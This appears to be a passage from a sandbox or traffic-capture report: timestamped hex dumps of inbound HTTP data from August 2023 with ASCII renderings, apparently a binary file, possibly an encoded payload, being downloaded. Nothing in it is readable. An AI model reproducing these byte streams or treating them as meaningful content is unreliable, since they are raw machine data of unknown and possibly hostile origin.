                                                                                                                  2023-08-29 17:16:42 UTC1544INData Raw: 85 49 1b 3b a1 1b 19 3b 70 5c 1b f3 90 48 03 74 47 a8 3a 3b 54 64 5b d2 b4 ad 19 10 45 4a 0b 63 d5 33 4c 20 40 ec 29 d0 28 79 19 5d 75 49 ab 85 75 49 9e e0 45 d5 29 d0 fd 79 19 43 4e 79 19 9f 4e 32 8b 08 49 46 ae 18 7d 88 f1 c0 75 4c 38 8c 75 4c 19 59 85 07 35 b6 cc 0f 29 70 40 e7 17 8e 75 79 3b 80 46 e8 17 b3 4b 64 88 a7 31 41 04 fd e4 f9 1a a4 48 01 51 1c 30 53 99 d4 94 2d f2 dd c5 49 38 9a 79 a2 1d d1 f9 38 1c 0c 8b 4b 1c f8 13 3d f1 24 c5 5b 7f 20 96 79 1e f0 ad 5d 74 b0 45 6b e9 d8 25 49 3d 22 40 19 09 a4 45 74 51 a4 74 01 6d f5 0d 49 51 a4 5d 01 6d dc 0d 3c cb e1 91 43 f2 f8 00 4f 06 50 45 f8 22 2c ae 5f ac c2 b4 4e 0b c4 b7 4e a9 d7 80 af 89 d8 fd 67 7f 20 76 fd a5 00 4a c9 e0 59 38 a5 de d7 31 cd db 14 ce 54 e8 b9 c8 fe 7d d0 41 99 96 c2 ce b8 fc
                                                                                                                  Data Ascii: I;;p\HtG:;Td[EJc3L @)(y]uIuIE)yCNyN2IF}uL8uLY5)p@uy;FKd1AHQ0S-I8y8K=$[ y]tEk%I="@EtQtmIQ]m<COPE",_NNg vJY81T}A
                                                                                                                  2023-08-29 17:16:42 UTC1548INData Raw: 75 a8 1d 34 a4 4d 43 cb ac 4d cf 39 2b c8 03 d8 a4 4d 09 02 c9 a9 1d 23 e3 c1 06 cc ac 40 f8 93 17 a9 b9 d3 fd 75 f8 d4 8e ae 1d 3c 2d a0 ed 71 c6 62 f5 30 45 a3 1c 60 10 a8 1c a0 a4 4c 82 39 40 1f f0 df a5 1c f9 d4 cd a8 1d 4c a4 4d 6a 37 41 ba 4d 39 7a a4 9a b0 a4 4d d1 31 41 02 a8 37 41 f6 f0 c7 ac 4d 98 9b 7d a8 1d da b1 a8 1d f3 a2 4d fe 39 aa da 3c 3c 4b 59 f8 d4 65 c4 f9 d4 be ec 34 38 66 6d f0 c8 a4 6a f1 70 46 f1 55 bd a4 4d ca 35 41 a8 7b 32 ac 40 f8 c3 85 5c f8 d4 3d a8 1d 7b a2 40 f5 39 91 e3 b9 3c 67 d1 f8 d4 e1 a8 1d 53 a2 4d b1 77 ac 06 f0 d9 e5 a9 1d a0 a4 4d 93 00 a4 4d 42 37 41 b9 f0 54 a5 40 34 51 1d 35 f0 da a4 0e 59 31 40 4d 97 15 a5 4c 32 37 40 41 f0 84 ac 4d f8 5b 6f 51 f8 d4 75 a8 1d d3 a2 4d f6 39 e1 86 8b 3c 51 b9 bd 30 41 15 f8
                                                                                                                  Data Ascii: u4MCM9+M#@u<-qb0E`L9@LMj7AM9zM1A7AM}M9<<KYe48fmjpFUM5A{2@\={@9<gSMwMMB7AT@4Q5Y1@ML27@AM[oQuM9<Q0A
                                                                                                                  2023-08-29 17:16:42 UTC1552INData Raw: d0 eb 47 4e 65 48 95 f1 44 c9 86 f0 44 e3 89 f1 44 c5 38 d1 d1 68 18 48 64 48 4b 48 64 48 b1 70 65 48 85 f1 44 fd 4c f1 44 e9 38 d1 85 68 18 74 a8 6b 3d 1e e2 8a b9 10 45 80 09 bc e3 08 81 5d 40 75 ed 78 66 21 d9 d0 cf 1c f9 d1 e6 81 6c 57 40 29 3a 6e ef 6a a7 10 45 c0 1c 50 a3 e0 d8 4a 68 42 85 7e 06 6c d9 d0 8a 7a 85 b4 ea ea 0b b0 45 36 0d fc f5 3a 3e bb 25 49 f6 c9 b1 8a 18 28 89 48 3d ef f4 ee 3a ef 25 49 d6 d1 c1 fb db d1 cd 29 19 89 8c 48 71 7b 44 11 f8 c4 31 d8 19 30 1e eb 01 41 45 ad bb c8 d4 49 f1 41 45 9d 7c 41 45 a5 88 d0 81 e5 68 83 d4 49 a1 86 e8 38 4a 41 45 ad 88 d0 bd 74 09 cc eb fd 7a a9 25 49 76 de a1 8a 18 38 89 48 ad 88 f6 e8 48 cf 14 00 88 d0 41 d9 19 e9 4f 18 9d 66 26 45 79 d0 7a 4c 55 67 e2 ca 43 b0 45 80 18 10 f0 d9 1d dc 74 4c b3
                                                                                                                  Data Ascii: GNeHDDD8hHdHKHdHpeHDLD8htk=E]@uxf!lW@):njEPJhB~lzE6:>%I(H=:%I)Hq{D10AEIAE|AEhI8JAEtz%Iv8HHAOf&EyzLUgCEtL
                                                                                                                  2023-08-29 17:16:42 UTC1556INData Raw: 04 25 75 bf 26 2d 18 94 45 2c 75 b5 31 2c 5e a2 24 89 69 b8 2c 2a 6a d0 05 43 bb d2 4d 20 6a a0 25 5b 50 bd 24 2e 1e 76 43 29 0b 32 44 1e 70 b4 31 21 98 bc 47 01 7c b9 22 21 6d 75 42 48 bc d2 15 20 61 b5 29 0f 76 a8 37 24 78 71 65 68 1a 12 47 89 1a 96 41 3b 78 50 58 20 74 b5 2b 3a 99 b9 2a 27 6a 9c 2c 3a 2b d4 e7 0a 99 cc 31 49 6c f8 46 1a d9 c5 79 2a 6d f3 62 0b 1d 31 74 2d 17 80 37 49 76 a0 20 3b 6d a9 0c 3d 25 b5 28 cd 3f e0 46 ed 1b b3 7d 0b 70 d8 31 24 78 b0 66 26 74 83 31 c4 19 d2 28 ec 10 63 46 00 5a 9d f0 4e 29 b3 24 27 29 b4 46 ea 1b 9c 2a d5 7a bb 65 48 3f fa e6 4b 4c be 65 66 06 33 47 69 2a b9 60 6c 29 70 27 3d 7c a8 5a ec 38 b1 7b 8b 1a 30 11 6d 16 bc 2a 27 66 37 77 56 19 cf 45 56 19 cf 45 56 19 d9 45 e5 1b 7a a2 ed b5 60 4c 49 0d c3 40 a9 ad
                                                                                                                  Data Ascii: %u&-E,u1,^$i,*jCM j%[P$.vC)2Dp1!G|"!muBH a)v7$xqehGA;xPX t+:*'j,:+1IlFy*mb1t-7Iv ;m=%(?F}p1$xf&t1(cFZN)$')F*zeH?KLef3Gi*`l)p'=|Z8{0m*'f7wVEVEVEz`LI@
                                                                                                                  2023-08-29 17:16:42 UTC1560INData Raw: 09 7b 70 f5 44 49 7f e1 4b dd 3c cc 45 cf 5a d0 85 c0 04 6c 47 1c 69 61 51 84 8c ed c2 de 39 53 4e 49 63 07 67 5d 18 92 3c 52 18 9c 20 27 7e 22 19 93 97 d1 55 db 4c f4 35 fc 6a d0 13 98 1d ff 07 46 e9 62 17 31 aa d0 18 fe 52 9d 20 dc 09 e0 26 79 18 14 15 fb 78 b2 d5 78 1c 44 4d 47 0b ec 20 3a 72 a4 2a b6 5d d5 51 1c da d0 c7 5a 68 4c c4 8e 3e d1 34 5e e5 4a 47 ea 1c 90 4a 49 0c c1 06 4a 88 a2 d0 42 fa e2 97 4a 87 c2 63 20 75 b4 45 4f b4 40 45 7c 1f 64 47 1c 77 a2 4e d0 32 40 48 f8 ef d1 13 20 6a b9 ea 09 13 20 c2 db 14 50 47 3b 49 8a 21 8d 1a 90 49 4b 49 a4 0c 27 2a cd 05 da 2a 4a d5 cc 76 a2 b6 4e f0 d1 a1 49 3a 91 05 5b 0b d0 45 17 6d e3 15 26 19 a0 30 39 54 b5 2b 3c 19 b2 70 ba 05 be 30 00 39 dc d1 d5 2e 67 70 48 28 b7 75 56 2b e9 47 9d 84 5f d5 78 3a
                                                                                                                  Data Ascii: {pDIK<EZlGiaQ9SNIcg]<R '~"UL5jFb1R &yxxDMG :r*]QZhL>4^JGJIJBJc uEO@E|dGwN2@H j PG;I!IKI'**JvNI:[Em&09T+<p09.gpH(uV+G_x:
                                                                                                                  2023-08-29 17:16:42 UTC1564INData Raw: 51 c9 18 f0 c5 10 84 24 46 09 19 22 08 4d 19 0c c5 4a 7d c0 cf 41 19 79 c5 7a c9 d9 49 49 19 50 78 48 19 c4 0d 42 19 d0 34 99 1a d0 a5 48 1d d0 45 a4 e9 d3 45 6c e8 d3 45 49 91 0c 40 49 f9 45 4e 49 19 83 9c 4a 19 9a d5 4a 19 d0 8d 71 12 d0 b5 f4 12 d0 45 50 96 d5 45 1b f3 d4 41 49 1d 10 7f 09 d5 db 45 18 19 54 4d 49 41 dd 49 49 ec db 85 58 d8 d0 a9 89 20 86 bb 4a 19 d0 86 40 1d d0 c3 43 1c d0 05 85 bc d4 45 de f4 10 21 49 19 dc 45 aa 6d d3 45 f6 6a d0 46 49 77 a6 46 49 32 9e 45 4d 19 ec dd 41 19 3c 7b 49 12 d0 79 0b 12 d0 99 76 11 db 45 79 d9 d1 89 09 12 d0 65 7e 46 d8 45 e6 d9 90 30 70 19 d5 45 fc 2e d5 45 fd 24 d1 85 78 a6 db 45 6d a7 db 45 43 e5 10 65 3c d9 84 4a db 11 d0 45 04 b4 d5 45 59 ae d4 45 49 64 23 46 49 e1 9b 41 49 19 74 84 4d 19 40 ee 4c 19
                                                                                                                  Data Ascii: Q$F"MJ}AyzIIPxHB4HEElEI@IENIJJqEPEAIETMIAIIX J@CE!IEmEjFIwFI2EMA<{IyvEye~FE0pE.E$xEmECe<JEEYEId#FIAItM@L
                                                                                                                  2023-08-29 17:16:42 UTC1568INData Raw: 85 49 8d c5 85 49 cb 10 45 a7 d9 d0 62 5c 13 84 45 12 d9 d0 ca 89 19 13 85 49 e1 91 85 49 34 c6 4f 49 7d 10 45 e9 1c 10 45 9a d9 d0 59 5e 13 d0 05 1c d9 d0 2b 89 19 45 85 49 de 10 45 b3 58 10 45 72 01 da 45 cd d9 d0 f7 2c d9 d0 ab 89 19 c2 5c 89 3b 10 45 cf 8c 10 45 e6 d9 d0 a9 89 19 f9 5f 89 45 85 85 49 82 10 45 f4 d9 d0 ac 89 19 c8 15 52 13 d0 0f 29 19 a2 25 49 b0 b5 25 49 c6 b0 45 51 05 30 73 29 19 be 10 29 19 70 25 49 d4 b0 45 b0 79 d0 60 19 04 da 45 28 79 d0 dd 29 19 00 04 29 19 d8 5b 43 19 94 25 49 6f c5 25 49 bb b0 45 9f 79 d0 69 56 13 84 45 1f 79 d0 c2 29 19 64 25 49 f0 d5 25 49 e6 b0 45 71 39 da 45 21 4c b0 45 d5 79 d0 a5 29 19 2d 25 49 2d 80 64 43 19 ba 25 49 a3 b0 45 40 49 f2 4f 49 40 b0 45 e3 79 d0 a3 08 79 d0 20 6a 13 d0 df 29 19 1f 20 29 19
                                                                                                                  Data Ascii: IIEb\EII4OI}EEY^+EIEXErE,\;EE_EIER)%I%IEQ0s))p%IEy`E(y))[C%Io%IEyiVEy)d%I%IEq9E!LEy)-%I-dC%IE@IOI@Eyy j) )
                                                                                                                  2023-08-29 17:16:42 UTC1572INData Raw: 25 49 c4 b0 45 40 49 c3 4e 49 42 b0 45 c2 79 d0 95 08 79 d0 52 5d 12 d0 0c 29 19 a7 50 29 19 65 25 49 c3 b0 45 53 0c db 11 49 4f b0 45 dc 79 d0 91 29 19 dc 13 5f f9 c9 25 49 52 b0 45 23 79 d0 cd 1c 79 d0 ec 29 19 16 25 49 fc b0 45 49 49 c7 4e 49 02 b0 45 70 79 d0 1f 1c 79 d0 3f 29 19 4c 25 49 a5 b0 45 91 1c b0 45 bb 79 d0 4e 51 12 d0 10 5c 79 d0 cf 29 19 02 25 49 01 c9 4e 1d 19 84 25 49 8a b0 45 93 79 d0 60 1f 03 30 5b 29 19 72 25 49 f9 b0 45 69 49 cb 4e 49 46 b0 45 d5 79 d0 99 10 79 d0 5c 55 f9 d5 25 49 8b b0 45 f5 1c b0 45 a8 79 d0 42 54 12 d0 69 1c 79 d0 16 29 19 50 25 49 be b0 45 87 1c b0 45 bf 79 d0 5e 57 12 d0 05 1c 79 d0 2d 29 19 5c 25 49 ad b0 45 9e 1c b0 45 b5 79 d0 5a 56 12 d0 06 1c 79 d0 2f 29 19 5b 25 49 a8 b0 45 9c 1c b0 45 b3 79 d0 65 69 12
                                                                                                                  Data Ascii: %IE@INIBEyyR])P)e%IESIOEy)_%IRE#yy)%IEIINIEpyy?)L%IEEyNQ\y)%IN%IEy`0[)r%IEiINIFEyy\U%IEEyBTiy)P%IEEy^Wy-)\%IEEyZVy/)[%IEEyei
                                                                                                                  2023-08-29 17:16:42 UTC1576INData Raw: 45 4c f7 d5 10 11 5a bf 37 49 7c fe 21 25 75 d0 7a 76 19 e0 7a 6d 50 95 29 2c 74 d0 20 27 6d 9c 2c 3a 6d b5 45 27 7c a2 0c 24 69 bc 05 49 4f 94 2c 28 75 bf 22 01 19 87 0b 0d 51 bf 36 3d 59 d0 01 20 6b b5 26 3d 4c 99 41 09 59 98 44 18 58 95 05 08 99 92 13 79 28 90 05 13 66 d9 38 36 10 88 ff 41 9d d2 1a 58 86 d8 3a 59 3d 15 81 4f 7d d4 43 19 6d a2 da 4e 35 c0 76 16 11 80 4d 19 58 b6 41 6c 10 93 17 49 54 93 2a 24 69 bf 30 27 19 b4 16 3d 6b b9 2b 2e 4b 50 20 3a 76 a5 37 2a 7c 57 4b 4a 26 d5 64 4c 50 9b 15 0b 46 87 42 16 1c 16 65 c9 1d 94 10 00 49 b1 b5 3b 6a b5 37 a4 1b 72 53 b6 08 af 47 b6 c6 d8 ca 4b a6 d8 64 4b 66 d6 32 4f a2 d1 d4 4c d9 e0 0e 79 49 91 0e 46 1b eb 40 0d 4a a9 05 53 74 9d 20 39 1e b3 a5 00 77 a4 20 2e 8c de ae 4c 76 d2 ba 2e 1b 1f 4e cd 1f
                                                                                                                  Data Ascii: ELZ7I|!%uzvzmP),t 'm,:mE'|$iIO,(u"Q6=Y k&=LAYDXy(f86AX:Y=O}CmN5vMXAlIT*$i0'=k+.KP :v7*|WKJ&dLPFBeI;j7rSGKdKf2OLyIF@JSt 9w .Lv.N
                                                                                                                  2023-08-29 17:16:42 UTC1580INData Raw: 10 49 50 90 05 1a 5e 9a 15 08 19 80 04 1f 5c bc 20 24 7c d0 2b 3d 59 e2 05 09 43 d0 44 44 a5 83 20 39 78 a2 24 3d 7d bf 37 67 69 a5 27 48 0d e4 29 08 19 b3 26 2c 6a a3 2c 2b 75 5e 20 44 59 d8 7b 4b 54 94 30 20 11 fc 64 5b 4a 84 20 31 6d 75 06 07 78 d0 31 20 6f b5 0d 1e 57 94 4d 01 76 a3 c8 53 5b 8f 12 79 91 80 04 1c 98 de 1a 16 59 50 7a 09 4c 98 0c 0a 56 9e c4 4c 51 d3 47 49 9b d8 0b 1a 4d 91 0b 0a 33 95 c4 43 50 d2 71 78 92 e0 2c 27 19 b5 02 3b 70 b4 09 28 60 14 2a 3c 95 e0 0d 19 5b 50 64 49 00 20 13 28 75 a5 c9 2f 80 cb c7 50 1d dc 84 43 03 80 24 3b 6a b5 89 27 19 f5 64 02 30 80 73 0e 41 11 73 78 51 cc 05 13 09 fc 94 59 bc d9 07 0d 51 f7 34 5e 99 db c4 44 29 e0 91 45 76 a0 b1 3c 69 91 32 7b bc a5 03 45 37 dc d1 cb 1a 99 c4 9a 3e 87 2c 27 7d bf 32 28 86
                                                                                                                  Data Ascii: IP^\ $|+=YCDD 9x$=}7gi'H)&,j,+u^ DY{KT0 d[J 1mux1 oWMvS[yYPzLVLQGIM3CPqx,';p(`*<[PdI (u/PC$;j'd0sAsxQYQ4^D)Ev<i2{E7>,'}2(
                                                                                                                  2023-08-29 17:16:42 UTC1584INData Raw: 73 8f 4e e1 05 69 63 11 c5 53 69 b5 37 3d 60 f2 0e 69 1b bd 65 73 4f 32 3d 68 11 e2 65 4b f6 da 17 59 7c a3 0c 0d 31 c9 07 0c 48 d8 04 16 4e f2 42 1f 78 bc 30 4c 8b c2 30 a9 14 99 31 2c 74 82 15 28 77 b7 20 eb 06 9a 01 57 5d 52 06 04 44 98 01 0a 46 8f 03 6b 69 94 24 3d 78 54 4a d9 21 73 3b 00 19 85 2b 22 77 bf 32 27 59 d7 a6 5e ba c0 a3 66 5d b5 23 28 6c ee 29 aa 7a 83 d1 6f 35 b3 20 6c 16 b9 36 29 69 b1 31 2a 71 b1 c2 6f 16 a5 95 20 58 b3 26 c9 59 b9 85 2e 31 d8 bb 02 33 fb 84 ce d8 c2 60 41 1f f1 66 20 0a ba 84 28 3b 91 07 1c 46 97 a5 4f 1a c9 4b 11 bd d6 e7 6a f9 cf 16 3d 6b b9 69 27 7e 1a 60 29 58 80 c5 66 46 9e 43 78 7c d5 01 59 57 b1 31 20 6f 30 20 01 4e 9e 01 86 15 01 f4 4d 1b a8 03 26 6b 11 71 26 8e 1b 43 8e 10 9a 44 a2 17 80 2a 3a 70 a4 2c 26 3b
                                                                                                                  Data Ascii: sNicSi7=`iesO2=heKY|1HNBx0L01,t(w W]RDFki$=xTJ!s;+"w2'Y^f]#(l)zo5 l6)i1*qo X&Y.13`Af (;FOKj=ki'~`)XfFCx|YW1 o0 NM&kq&CD*:p,&;
                                                                                                                  2023-08-29 17:16:42 UTC1588INData Raw: 61 2b 1e d0 c7 2b 76 b2 41 26 61 4f 42 28 61 84 20 31 27 a4 66 dd da de 4b 78 c6 d6 85 4f 4e 9c 3a 48 1e 90 5c 47 1f b7 4c 4a 1e 34 51 88 84 a3 85 01 7c b9 22 21 6d cf 4d 5f 11 13 1a 4e 53 d7 2c 24 6c bd 07 4f 99 d0 a5 2e 6b b5 36 3a 26 cd cd 4f 06 63 d4 ef 1f b5 2b 3c 39 5c 0c 0d 9a dd 95 26 69 a5 35 08 1b e2 5a 4e 79 c2 45 28 7e b5 06 28 75 bc 27 91 78 b3 2e e4 28 d0 ff 00 f9 d6 45 0e e9 97 08 1a 5e b3 d2 07 1f 3e 03 f6 1f 50 2e 09 51 87 0b 0d 51 70 34 4a c6 d6 8f 4f 4f b9 37 3d 6c b1 87 25 b8 bc 13 20 7c a7 da 4f 98 d6 06 af 2c 4f 40 22 51 b5 29 09 3d 90 51 0a 5d 90 60 1d 99 b3 20 3d 5e d4 24 2d b9 d0 04 2d 78 a0 31 7b 76 30 e6 1a 5e 90 4d db bb 85 0c 66 9e d6 a7 48 ff dc a7 e1 28 13 48 20 77 53 fa 2e af e5 2c 27 4a b9 3f 0a 1a 2f 5a 41 26 d3 71 4a 46
                                                                                                                  Data Ascii: a++vA&aOB(a 1'fKxON:H\GLJ4Q|"!mM_NS,$lO.k6:&Oc+<9\&i5ZNyE(~(u'x.(E^>P.QQp4JOO7=l% |O,O@"Q)=Q]` =^$--x1{v0^MfH(H wS.,'J?/ZA&qJF
                                                                                                                  2023-08-29 17:16:42 UTC1592INData Raw: 05 1c 58 97 0e 11 43 d0 45 76 4b b5 29 2c 78 a3 45 2c 5d 93 05 1e 55 95 21 41 70 a4 11 48 c9 95 0d 19 58 d0 10 01 5d 93 1a 16 59 90 47 09 11 40 2a 2a 56 b2 2f 09 18 d3 5d 01 76 a3 31 09 5d b9 45 3b 7c b3 31 1c 50 90 05 59 48 91 00 03 1a 4e 28 26 6f d0 20 09 5c bc 20 24 7c be 84 44 59 80 04 1f 28 e2 41 eb 0d f6 52 49 65 d0 63 4a 31 99 4d 60 4f b9 37 49 6d a5 24 25 55 b9 36 3d 09 86 2c 2c 6e d2 0a 16 57 91 45 0b 4f 99 31 2c 74 82 24 51 77 b7 20 4c b3 d1 6b 08 75 bc 45 0a 76 be 31 3b 76 bc 36 49 59 84 2a 26 75 b2 24 3b 16 c6 ee d9 0c 56 42 dc 00 95 29 25 70 c0 35 3a 70 a3 42 d3 50 91 00 cf 41 57 4a 48 4a b5 2b 2c 6b 43 c6 73 41 50 eb 00 9d dc c3 5d 90 5b 09 26 99 b3 24 25 4f b1 29 3c 0f 74 45 0b 4c 80 37 26 69 b5 37 09 6d a9 0c 27 7f bf 4f 57 54 a8 20 27 6c
                                                                                                                  Data Ascii: XCEvK),xE,]U!ApHX]YG@**V/]v1]E;|1PYHN(&o \ $|DY(ARIecJ1M`O7Im$%U6=,,nWEO1,t$Qw LkuEv1;v6IY*&u$;VB)%p5:pBPAWJHJ+,kCsAP][&$%O)<tEL7&i7m'OWT 'l
                                                                                                                  2023-08-29 17:16:42 UTC1596INData Raw: 3c 56 17 42 28 08 4f 28 74 7b 59 c0 98 15 1e a1 a4 f9 1a 80 13 4f 6a 00 45 19 1b 94 20 2f 7c a2 d5 0a 60 b3 29 58 6f 80 04 9b 5a d0 1a 0d 70 a3 35 25 78 a9 67 07 89 6c 06 28 75 a0 e3 2a 72 d3 2a 4f 8c 97 02 08 5d 97 00 1d 0a 53 a7 78 c7 95 33 29 1b 9d 36 2e 80 83 29 16 5f 20 47 69 f3 b3 2e 3b 18 27 9f 89 48 da f1 e0 28 61 4f 09 69 42 47 fb 13 12 74 ad 1a bc 30 3a 71 64 3e 66 11 de 0e df 17 4c 49 fa 1a bf 37 2a 7c 2c 01 1a 6a 06 44 18 36 c6 6a 5f 3a c6 e7 4a 06 b3 42 5d 04 9c 82 48 eb 41 44 3c ad d0 20 3b 6d a9 0c 27 7f bf 45 09 5d b9 37 2c 7a a4 10 49 50 90 05 08 19 ef 1a 0e 39 b5 31 1a 7c bc 45 c9 70 bf 45 27 50 be 21 2c 61 90 06 c9 76 bd 27 26 7b bf 3d 41 b9 d0 0c 08 5c 98 15 08 4f 86 45 28 75 a5 20 09 2b 90 05 4b 43 d0 35 1b 7c bd 2a 3f 7c f0 09 26 7a
                                                                                                                  Data Ascii: <VB(O(t{YOjE /|`)XoZp5%xgl(u*r*O]Sx3)6.)_ Gi.;'H(aOiBGt0:qd>fLI7*|,jD6j_:JB]HAD< ;m'E]7,zIP91|EpE'P!,av'&{=A\OE(u +KC5|*?|&z
                                                                                                                  2023-08-29 17:16:42 UTC1600INData Raw: 35 49 68 de 95 39 19 a1 4b ff d9 a0 45 f8 3a 7c 35 49 68 c4 d9 39 19 3d b4 36 91 a0 45 b8 37 a8 35 49 eb fe 35 49 04 21 6b 29 69 d0 b4 38 19 d0 fa fa 9b d0 44 49 21 b4 7e 39 18 d0 35 57 e6 d0 45 48 61 d9 1d 40 19 88 77 79 23 a0 44 55 49 d0 59 48 95 d5 45 0d 19 d0 2c 49 6b d0 20 49 7a d0 27 3d 19 c2 2a 49 77 dd 35 c9 19 de 44 49 1a d4 45 4b 19 04 00 72 cd a0 bd 49 1a 0c 45 4a 31 d0 56 c8 18 91 40 49 09 96 7e 39 1b 55 38 2c ac 57 cc 75 9d a7 69 c9 1a 51 4a 51 99 d3 53 4a 98 f7 c5 4a 12 50 46 b9 28 e0 11 39 15 50 46 a9 99 d3 57 c9 1a 1c 10 c9 1a c7 c5 4a d9 50 46 57 99 d3 f1 1c 99 d3 64 c9 1a 70 c5 4a 3b 50 46 d9 b2 50 46 c8 22 a8 c5 4a 30 50 46 25 99 d3 ef 63 99 d3 11 c9 1a fb c5 4a 25 50 46 23 35 50 46 6d 99 d3 68 c8 52 50 46 67 d8 50 46 b5 29 e0 35 66 98
                                                                                                                  Data Ascii: 5Ih9KE:|5Ih9=6E75I5I!k)i8DI!~95WEHa@wy#DUIYHE,Ik Iz'=*Iw5DIEKrIEJ1V@I~9U8,WuiQJQSJJPF(9PFWJPFWdpJ;PFPF"J0PF%cJ%PF#5PFmhRPFgPF)5f
                                                                                                                  2023-08-29 17:16:42 UTC1604INData Raw: 36 47 4f cc 31 49 10 d0 7d 79 18 db 35 49 09 79 31 47 b1 44 76 4b 5d 60 e2 26 e9 76 af 0d 49 d0 32 b9 14 82 d7 e1 66 e6 4a 49 e6 df 45 46 19 df 45 46 19 df 45 b6 14 64 c3 36 05 7b 43 49 64 dc 15 19 02 a2 d5 45 7c 80 45 b6 c6 dc 4a 49 16 d0 4a 49 16 d0 4a 49 16 d0 3a 45 af c8 3a 45 1f d0 04 b9 13 41 49 3e b6 d1 ba 46 19 df 45 46 19 df 45 46 19 df 45 46 19 af 49 55 19 d4 75 0a c6 d1 3a 02 5d a2 2a a9 69 94 2a 3e 77 34 97 73 50 2f 08 4e ec 9d 0a 4a ed 9d 0e fa 19 92 30 3d 6d bf 2b 09 2b d0 05 09 5d b9 37 2c 7a a4 45 1c 50 90 05 49 57 ce 79 5d 69 9d 45 51 55 d0 5d 4b 19 d0 41 49 e6 d0 45 69 8f eb 35 48 54 d4 69 a1 19 fc 40 15 a9 47 42 67 61 d8 dd 72 69 d0 51 49 54 d0 30 09 19 bc 45 3d 19 b9 45 43 70 20 45 27 19 b5 44 61 95 d0 44 f6 18 d0 49 a5 8c 53 1c 58 19
                                                                                                                  Data Ascii: 6GO1I}y5Iy1GDvK]`&vI2fJIEFEFEd6{CIdE|EJIJIJI:E:EAI>FEFEFEFIUu:]*i*>w4sP/NJ0=m++]7,zEPIWy]iEQU]KAIEi5HTi@GBgariQIT0E=ECp E'DaDISX
                                                                                                                  2023-08-29 17:16:42 UTC1608INData Raw: 58 a8 3e a4 a5 49 f8 f6 2c 75 49 b1 37 4b 6a 2b 2d 0d 60 be 24 24 70 d0 26 08 6b a2 24 30 59 80 49 08 41 af 40 2f 1c 85 0b 26 7d de 20 a1 1c a8 08 26 1e 83 2d 2c 7c ae 31 53 11 2b 42 0d 65 e8 4d b6 1a 26 46 1c e9 93 2a 27 7d bf 46 ca 1e af 46 3e 1a 20 01 2c 7a bc 3a 4a 6a d3 74 6c 28 d0 45 75 4a b3 24 27 77 b5 37 49 5f b1 2c 25 6c a2 20 77 3e 61 41 b8 2d a9 40 0d 4c b0 5c 01 7c b4 24 39 65 da 0b 3d 5d d1 78 0f 78 b0 36 2c 56 b2 2f f9 1f 6f 44 76 39 f4 11 3b 7c b5 c4 59 4d 90 45 1f 5d a5 13 20 6a a5 24 57 75 60 4c 74 0d 85 47 74 17 9d 36 2e 0a 76 40 32 1c 95 33 59 0f 97 24 2d 99 b7 20 3d 50 bd 35 25 c8 d5 ba 61 18 a0 13 e1 1a af 4c ee 11 2d 4f 3a 18 f5 40 46 4c d2 98 4c 64 d3 a9 48 19 c0 af 7f 19 a0 75 ef 29 a0 81 ad 2f 04 35 0d 69 d0 2c b9 19 8c 35 49 e8
                                                                                                                  Data Ascii: X>I,uI7Kj+-`$$p&k$0YIA@/&} &-,|1S+BeM&F*'}FF> ,z:Jjtl(EuJ$'w7I_,%l w>aA-@L\|$9e=]xx6,V/oDv9;|YME] j$Wu`LtGt6.v@23Y$- =P5%aL-O:@FLLdHu)/5i,5I
                                                                                                                  2023-08-29 17:16:42 UTC1612INData Raw: 91 49 99 21 44 4c e9 d0 31 39 19 25 b0 95 19 b4 84 39 19 2f a1 8d 19 88 34 4b 68 c4 64 b8 19 3b 88 49 35 22 45 b6 19 52 51 39 19 5a 6e ab 19 d8 35 49 19 75 6f 63 19 24 8b 79 69 f0 9b f1 9e d0 a5 39 19 8f db 41 b9 d0 8d 39 19 af ba 49 19 52 f1 39 19 02 2c 57 19 78 35 49 39 2f 3a 19 19 58 35 49 7d 45 2d a4 19 a4 b4 49 e1 a0 43 39 19 0c f5 5d 25 d0 1d 39 19 21 4d 0d 68 d0 55 49 92 d0 75 38 19 5b ce 49 9b c4 35 49 a1 56 4e 49 19 a0 45 89 b0 79 ec 49 f5 1d 35 48 39 83 c7 91 69 d0 f8 fe 72 d0 85 39 19 da ce b9 1b 70 35 49 4c bb 6a 49 9b 58 35 49 e6 5c 45 49 69 a0 45 69 80 e2 89 49 79 22 44 49 19 52 0d 39 19 39 d3 33 19 fc 35 49 39 5f f9 c6 19 c0 35 49 51 ed 45 c2 19 24 89 79 69 ff 0a 41 56 d0 9d 39 19 d0 8b 98 19 52 85 39 19 44 45 9a 19 7c 35 49 39 2f 51 da 19
                                                                                                                  Data Ascii: I!DL19%9/4Khd;I5"ERQ9Zn5Iuoc$yi9A9IR9,Wx5I9/:X5I}E-IC9]%9!MhUIu8[I5IVNIEyI5H9ir9p5ILjIX5I\EIiEiIy"DIR9935I9_5IQE$yiAV9R9DE|5I9/Q
                                                                                                                  2023-08-29 17:16:42 UTC1616INData Raw: 85 79 dd e0 8d 79 d5 e0 45 99 29 04 75 91 29 0c 75 49 f9 e0 a1 79 f1 e0 a9 79 19 20 75 bd 29 28 75 b5 29 d0 45 78 1d e1 4d 78 75 e1 45 39 28 a4 74 31 28 ac 74 49 99 e1 c1 78 91 e1 c9 78 19 40 74 dd 28 48 74 d5 28 d0 e5 78 bd e1 ed 78 b5 e1 45 f9 28 64 74 f1 28 3c 74 49 e9 e1 b1 78 e1 e1 b9 78 19 d0 77 4d 2b d8 77 45 2b d0 55 7b 0d e2 5d 7b 05 e2 45 69 2b f4 77 61 2b fc 77 49 29 e2 71 7b 21 e2 79 7b 19 90 77 0d 2b d8 76 45 2a d0 55 7a 0d e3 5d 7a 05 e3 45 69 2a f4 76 61 2a fc 76 49 29 e3 71 7a 21 e3 79 7a 19 90 76 0d 2a 98 76 05 2a d0 15 7a 4d e3 1d 7a 45 e3 45 29 2a b4 76 21 2a bc 76 49 69 e3 31 7a 61 e3 39 7a 19 50 76 cd 2a 58 76 c5 2a d0 d5 7a 8d e3 dd 7a 85 e3 45 e9 2a 74 76 e1 2a 7c 76 49 a1 e3 f9 7a d9 e3 81 7a 19 18 76 85 2a 00 76 9d 2a d0 9d 7a c5
                                                                                                                  Data Ascii: yyE)u)uIyy u)(u)ExMxuE9(t1(tIxx@t(Ht(xxE(dt(<tIxxwM+wE+U{]{Ei+wa+wI)q{!y{w+vE*Uz]zEi*va*vI)qz!yzv*v*zMzEE)*v!*vIi1za9zPv*Xv*zzE*tv*|vIzzv*v*z
